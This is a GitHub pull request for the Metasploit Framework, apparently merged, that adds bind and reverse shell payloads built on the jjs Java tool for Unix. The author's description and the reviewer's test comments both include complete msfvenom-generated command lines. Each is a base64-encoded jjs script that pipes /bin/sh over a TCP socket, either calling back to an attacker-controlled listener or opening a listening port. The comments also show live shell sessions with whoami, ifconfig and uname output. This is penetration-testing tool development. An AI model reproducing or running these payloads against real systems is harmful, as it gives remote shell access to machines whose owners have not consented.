Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add bind/reverse jjs unix cmd payloads #12544

Merged
merged 2 commits into from Nov 20, 2019

Conversation

@bcoles
Copy link
Contributor

bcoles commented Nov 6, 2019

Add bind/reverse jjs unix cmd payloads.

The jjs tool is installed with JRE 8 and is installed on plenty of Linux desktop distros by default.

I'm not sure how useful these payloads will be. Most Linux desktop distros will likely have a variety of other useful commands available (at least curl, wget, openssl, and probably perl and python) and probably whitelisted in application firewalls. Likewise, UNIX servers running JRE are likely to also have several viable tools available.

Also, jjs will apparently be deprecated and removed from JDK; however, it's unclear whether jjs will also be removed from JRE.

The generated payloads are also not particularly BadChar friendly, as they contain ' ) ; " | and space characters. Most of these (with the exception of |) could be removed by using echo -e and ${IFS} (nospace encoder), at the expense of portability and introducing \ $ { } as potential BadChar.

It is also worth noting that the payload cmd process will continue to run if the session does not exit cleanly (ctrl+c), rather that cleanly terminating the shell process (exit), leaving a useless open socket.

It's nice to have options. This will get you a shell.

# ./msfvenom -p cmd/unix/reverse_jjs LHOST=172.16.191.165 LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 863 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIFByb2Nlc3NCdWlsZGVyPUphdmEudHlwZSgiamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyIik7dmFyIHA9bmV3IFByb2Nlc3NCdWlsZGVyKCIvYmluL3NoIikucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzcz1KYXZhLnR5cGUoImphdmEubmV0LlNvY2tldCIpO3ZhciBzPW5ldyBzcygiMTcyLjE2LjE5MS4xNjUiLDEzMzcpO3ZhciBwaT1wLmdldElucHV0U3RyZWFtKCkscGU9cC5nZXRFcnJvclN0cmVhbSgpLHNpPXMuZ2V0SW5wdXRTdHJlYW0oKTt2YXIgcG89cC5nZXRPdXRwdXRTdHJlYW0oKSxzbz1zLmdldE91dHB1dFN0cmVhbSgpO3doaWxlKCFzLmlzQ2xvc2VkKCkpe3doaWxlKHBpLmF2YWlsYWJsZSgpPjApc28ud3JpdGUocGkucmVhZCgpKTt3aGlsZShwZS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBlLnJlYWQoKSk7d2hpbGUoc2kuYXZhaWxhYmxlKCk+MClwby53cml0ZShzaS5yZWFkKCkpO3NvLmZsdXNoKCk7cG8uZmx1c2goKTtKYXZhLnR5cGUoImphdmEubGFuZy5UaHJlYWQiKS5zbGVlcCg1MCk7dHJ5e3AuZXhpdFZhbHVlKCk7YnJlYWs7fWNhdGNoKGUpe319O3AuZGVzdHJveSgpO3MuY2xvc2UoKTs=')));"|jjs
# ./msfvenom -p cmd/unix/bind_jjs LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 795 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIHNzPW5ldyBqYXZhLm5ldC5TZXJ2ZXJTb2NrZXQoMTMzNyk7d2hpbGUodHJ1ZSl7dmFyIHM9c3MuYWNjZXB0KCk7dmFyIHA9bmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcigiL2Jpbi9zaCIpLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkuc3RhcnQoKTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V0RXJyb3JTdHJlYW0oKSxzaT1zLmdldElucHV0U3RyZWFtKCk7dmFyIHBvPXAuZ2V0T3V0cHV0U3RyZWFtKCksc289cy5nZXRPdXRwdXRTdHJlYW0oKTt3aGlsZSghcy5pc0Nsb3NlZCgpKXt3aGlsZShwaS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBpLnJlYWQoKSk7d2hpbGUocGUuYXZhaWxhYmxlKCk+MClzby53cml0ZShwZS5yZWFkKCkpO3doaWxlKHNpLmF2YWlsYWJsZSgpPjApcG8ud3JpdGUoc2kucmVhZCgpKTtzby5mbHVzaCgpO3BvLmZsdXNoKCk7amF2YS5sYW5nLlRocmVhZC5zbGVlcCg1MCk7dHJ5e3AuZXhpdFZhbHVlKCk7YnJlYWs7fWNhdGNoKGUpe319O3AuZGVzdHJveSgpO3MuY2xvc2UoKTtzcy5jbG9zZSgpO30=')));"|jjs
@bcoles bcoles added the payload label Nov 6, 2019
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Nov 20, 2019

Bind

[ruby-2.6.5@metasploit-framework](land-12544) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p cmd/unix/bind_jjs LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 795 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIHNzPW5ldyBqYXZhLm5ldC5TZXJ2ZXJTb2NrZXQoNDU2Nyk7d2hpbGUodHJ1ZSl7dmFyIHM9c3MuYWNjZXB0KCk7dmFyIHA9bmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcigiL2Jpbi9zaCIpLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkuc3RhcnQoKTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V0RXJyb3JTdHJlYW0oKSxzaT1zLmdldElucHV0U3RyZWFtKCk7dmFyIHBvPXAuZ2V0T3V0cHV0U3RyZWFtKCksc289cy5nZXRPdXRwdXRTdHJlYW0oKTt3aGlsZSghcy5pc0Nsb3NlZCgpKXt3aGlsZShwaS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBpLnJlYWQoKSk7d2hpbGUocGUuYXZhaWxhYmxlKCk+MClzby53cml0ZShwZS5yZWFkKCkpO3doaWxlKHNpLmF2YWlsYWJsZSgpPjApcG8ud3JpdGUoc2kucmVhZCgpKTtzby5mbHVzaCgpO3BvLmZsdXNoKCk7amF2YS5sYW5nLlRocmVhZC5zbGVlcCg1MCk7dHJ5e3AuZXhpdFZhbHVlKCk7YnJlYWs7fWNhdGNoKGUpe319O3AuZGVzdHJveSgpO3MuY2xvc2UoKTtzcy5jbG9zZSgpO30=')));"|jjs
msf5 exploit(multi/handler) > set payload cmd/unix/bind_jjs
payload => cmd/unix/bind_jjs
msf5 exploit(multi/handler) > set rhost 192.168.134.163
rhost => 192.168.134.163
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.134.163:4567
[*] Command shell session 1 opened (192.168.236.129:46701 -> 192.168.134.163:4567) at 2019-11-20 14:00:43 -0600

whoami
msfuser
ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.163  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:d34b:63b2:8d3b:ac60  prefixlen 64  scopeid 0x0<global>
        inet6 fd34:fe56:7891:2f3b:a453:31ed:5597:266  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::9897:ff98:fb10:3fbc  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:03:93:5e  txqueuelen 1000  (Ethernet)
        RX packets 153450  bytes 230366230 (230.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 66739  bytes 4541920 (4.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 352  bytes 31380 (31.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 352  bytes 31380 (31.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

uname -a
Linux ubuntu64-1804 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Reverse

[ruby-2.6.5@metasploit-framework](land-12544) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_jjs LHOST=192.168.135.168 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 863 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIFByb2Nlc3NCdWlsZGVyPUphdmEudHlwZSgiamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyIik7dmFyIHA9bmV3IFByb2Nlc3NCdWlsZGVyKCIvYmluL3NoIikucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzcz1KYXZhLnR5cGUoImphdmEubmV0LlNvY2tldCIpO3ZhciBzPW5ldyBzcygiMTkyLjE2OC4xMzUuMTY4Iiw0NTY3KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V0RXJyb3JTdHJlYW0oKSxzaT1zLmdldElucHV0U3RyZWFtKCk7dmFyIHBvPXAuZ2V0T3V0cHV0U3RyZWFtKCksc289cy5nZXRPdXRwdXRTdHJlYW0oKTt3aGlsZSghcy5pc0Nsb3NlZCgpKXt3aGlsZShwaS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBpLnJlYWQoKSk7d2hpbGUocGUuYXZhaWxhYmxlKCk+MClzby53cml0ZShwZS5yZWFkKCkpO3doaWxlKHNpLmF2YWlsYWJsZSgpPjApcG8ud3JpdGUoc2kucmVhZCgpKTtzby5mbHVzaCgpO3BvLmZsdXNoKCk7SmF2YS50eXBlKCJqYXZhLmxhbmcuVGhyZWFkIikuc2xlZXAoNTApO3RyeXtwLmV4aXRWYWx1ZSgpO2JyZWFrO31jYXRjaChlKXt9fTtwLmRlc3Ryb3koKTtzLmNsb3NlKCk7')));"|jjs
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_jjs
payload => cmd/unix/reverse_jjs
msf5 exploit(multi/handler) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Command shell session 2 opened (192.168.135.168:4567 -> 192.168.135.186:57608) at 2019-11-20 14:06:55 -0600

ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.135.186  netmask 255.255.255.0  broadcast 192.168.135.255
        inet6 fd34:fe56:7891:2f3a:a453:31ed:5597:266  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::9897:ff98:fb10:3fbc  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3a:a53b:44a4:bdb1:4f2  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:03:93:5e  txqueuelen 1000  (Ethernet)
        RX packets 153553  bytes 230380339 (230.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 67004  bytes 4573454 (4.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 466  bytes 41595 (41.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 466  bytes 41595 (41.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

whoami
msfuser
uname -a
Linux ubuntu64-1804 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C

@bwatters-r7 bwatters-r7 self-assigned this Nov 20, 2019
bwatters-r7 added a commit that referenced this pull request Nov 20, 2019
Merge branch 'land-12544' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 706bb89 into rapid7:master Nov 20, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Nov 20, 2019

Release Notes

This PR add reverse and bind payloads for the jjs tool installed with the JDK.

msjenkins-r7 added a commit that referenced this pull request Nov 20, 2019
Merge branch 'land-12544' into upstream-master
@bcoles bcoles deleted the bcoles:jjs_payloads branch Nov 20, 2019
@jmartin-r7 jmartin-r7 mentioned this pull request Nov 22, 2019
1 of 1 task complete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.